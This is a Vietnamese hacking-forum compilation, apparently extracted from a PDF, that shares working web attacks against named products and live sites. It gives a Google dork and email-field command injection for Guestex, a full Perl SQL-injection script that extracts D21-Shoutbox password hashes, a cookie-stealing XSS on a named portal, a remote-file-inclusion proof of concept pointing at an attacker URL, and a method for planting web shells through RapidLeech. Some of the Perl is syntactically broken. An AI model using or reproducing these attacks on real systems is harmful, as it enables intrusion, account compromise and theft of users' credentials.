Guestex Shell Command Execution Vulnerability Hưởng ứng với mọi người 1 chút : Tuy hơi cũ nhưng hiện tại vẫn dùng được Đầu tiên search bản dính lỗi.. Mình dùng allinurl: guestex.cgi trên
Trang 1Guestex Shell Command Execution Vulnerability
Hưởng ứng với mọi người 1 chút : Tuy hơi cũ nhưng hiện tại vẫn dùng được
Đầu tiên search bản dính lỗi Mình dùng allinurl: guestex.cgi trên google
Lỗi trong file guestex.pl cho phép ta thực hiện shell command
Ở trong guestbook tại phần " your e-mail:" ta điền :
someone@somewhere.com;[command here]
Có thể thử trên site sau :
http://www.mauroux.ch/
-
Tham khảo evuln.com
Pip(VNISS)
D21-Shoutbox version 1.1 exploit
Code:
################################################
#!/usr/bin/perl #
# D21-Shoutbox #
# Author : longnhi #
# Exploit Coded by Windak & langtuhaohoa #
# We are : Www.HceGroup.Net - Www.HceGroup.Biz #
################################################
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
# variables
Trang 2my $login_page = '?act=Login&CODE=01';
my $id = '';
my $table_fix = '';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";
# get user input
print ' Forum Use D21-Shoutbox URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty; # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty; # to turn it back on
print "\n" if $stty;
print 'id you want get hashpass? '; # it'll say next to one of their posts chomp (my $id = <STDIN>);
print ' Table prefix ( ex : ibf_ ) ? ';
chomp ( my $table_fix = <STDIN>);
Trang 3# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url = '/' }
do {
$resp = $ua->post ($base_url $login_page,
[ UserName => $user, PassWord => $pass, CookieDate => 1, ]);
} while ($tries && !$resp->is_success());
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' $resp->status_line "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
$| = 1;
print "\nAttempting to extract password hash from database \n ";
$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select member_login_key,1,1 from ".$table_fix."members where id=" $id "/*";
$resp = $ua->get ($base_url $post_pm_page $sql );
if (!$resp->is_success()) {
print "ERROR" ;
}
else {
print "" ;
#print $resp->content;
$rs=$resp->content;
if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "HASH : "; print $1 ;
print "\n \n Bug Hunter By : Longnhi \n";
print "Exploit Coded By : Windak & langtuhaohoa ! We are :
Www.HceGroup.Net ! ";
Trang 4}
else { print "Can't get the pass from output, try to find it manually : "; print
$resp->content;}
}
print "\x08 \x08\n hehehe ! Good luck to Hack !.\n";
<STDIN>;
langtuhaohoa(HCE)
Nuke Việt Với XSS
- Tìm thấy và mô tả bởi : Navaro(HCE)
- Nhận xét : Nuke Việt là 1 loại portal được phát triển dựa trên mã nguồn của PHP-Nuke, tuy nhiên so với php-nuke thì tính bảo mật của Nuke Việt cao hơn nhiều nhờ
có cơ chế antiddos, anti sql injection, anti remote include file nữa Tuy nhiên thì Nuke Việt lại có bug xss
- File dính bug : viewimg.php biến imglink
- Hôm nay lấy : http://xaluan.com/viewimg.php?imglink=a làm demo để anh em check
- Do không lộc biến nên đã xảy ra tình huống này, xem đoạn code sau :
Trích:
<img name="LargeImg" src="<?php echo $_GET['imglink']?>" border="0"
title="Close">
Giờ thì mọi người thấy đó , ta có thể dựa vào sự "thiếu sót" này để khai thắc lấy thông tin cookie
Hãy thử xem với :
Trích:
http://xaluan.com/viewimg.php?imglink="><script>document.write(docum
ent.cookie);</script><"
Trang 5Lưu ý : Cookie ta lấy được chứa những thông tin rất quan trọng như : id, name, password(tức nhiên đã mã hóa md5)
phpFaber TinyLink 1.x RFI vul
#########################################
#Product name: phpFaber TinyLink
#Affected version: 1.x
#Type: Remote file inclusion
#Discovered by: black_hat_cr @ VnForce Team
#Vendor: phpfaber.com
#Dork: "Powered By phpFaber TinyLink"
#Status: not reported
#Date: Dec 10 2006
#########################################
Affected file: /tiny_includes/config.php
vul code:
PHP Code:
require_once("$dir_ws/tiny_includes/i_INI.php");
proof of concept:
<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?
have fun !
(c) HcEgRoUp.NeT !
Rapid Leecher
Lâu ngày ko có trò gì vui, ngồi mò mò cái này cho mọi người tham khảo
Mọi người chắc biết thằng rapidleech này chứ, cái này dùng để transfer file từ Rapid, mega, về host của mình
Thực ra cái này ko phải là bug gì chỉ tại thằng này cho tranfer tất cả các loại file
mà ko check file type nên mình có thể lợi dụng cái này để tranfer file shell php hay
Trang 6asp từ rapidshare về host tụi nó